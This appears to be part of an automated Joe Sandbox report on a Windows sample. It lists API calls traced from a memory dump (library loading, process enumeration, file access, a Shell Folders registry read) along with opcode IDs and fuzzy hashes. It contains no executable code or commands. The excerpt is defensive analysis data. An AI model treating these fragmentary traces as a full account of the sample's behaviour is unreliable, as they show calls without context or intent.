                                                                                                                                                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3150196962-0
                                                                                                                                                                                                                              • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                                                                                                                                                              • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                                                                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$PointerRead
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3154509469-0
                                                                                                                                                                                                                              • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                                                              • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                                                                                                                                • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                                                                                                                                • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                                                                                                                                • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4232544981-0
                                                                                                                                                                                                                              • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                                                              • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3664257935-0
                                                                                                                                                                                                                              • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                                                                              • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                                                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                                                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                                                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                                                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                                                                                              • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressProc$FileModuleName
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3859505661-0
                                                                                                                                                                                                                              • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                                                                              • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileRead
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2738559852-0
                                                                                                                                                                                                                              • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                                                              • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileWrite
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3934441357-0
                                                                                                                                                                                                                              • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                                                              • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3664257935-0
                                                                                                                                                                                                                              • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                                                                                              • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                                                                                              • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                                                              • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                                                                                              • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                                                              • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ??3@
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 613200358-0
                                                                                                                                                                                                                              • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                                                              • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3664257935-0
                                                                                                                                                                                                                              • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                                                                              • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: EnumNamesResource
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3334572018-0
                                                                                                                                                                                                                              • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                                                              • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3664257935-0
                                                                                                                                                                                                                              • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                                                                              • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseFind
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1863332320-0
                                                                                                                                                                                                                              • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                                                                              • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Open
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 71445658-0
                                                                                                                                                                                                                              • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                                                                              • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                                                                              • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                                                                              • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                                                                                                                                                                                              • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 004095FC
                                                                                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                                • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                                                                                                                                • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                                                                                • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3655998216-0
                                                                                                                                                                                                                              • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                                                                                              • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00445426
                                                                                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                                • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                                • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1828521557-0
                                                                                                                                                                                                                              • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                                                                                              • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                                                                                                • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
